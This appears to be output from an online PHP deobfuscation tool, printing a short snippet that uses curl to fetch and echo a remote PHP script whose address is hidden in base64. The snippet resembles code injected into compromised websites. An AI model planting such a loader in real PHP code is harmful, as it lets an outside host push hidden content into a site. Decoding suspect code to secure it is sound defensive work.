Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, base64_decode('aHR0cDovL3FkZ3ZzdC5..

Decoded Output download

<?php $ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, base64_decode('aHR0cDovL3FkZ3ZzdC5jb20vbC5waHA=')); 
curl_setopt($ch, CURLOPT_HEADER, 0); 
curl_exec($ch); 
curl_close($ch); ?>

Did this file decode correctly?

Original Code

<?php $ch = curl_init();
curl_setopt($ch, CURLOPT_URL, base64_decode('aHR0cDovL3FkZ3ZzdC5jb20vbC5waHA='));
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch); ?>

Function Calls

curl_init 1

Variables

None

Stats

MD5 d9b891b772f8b27672ca24c9f7723c5e
Eval Count 0
Decode Time 75 ms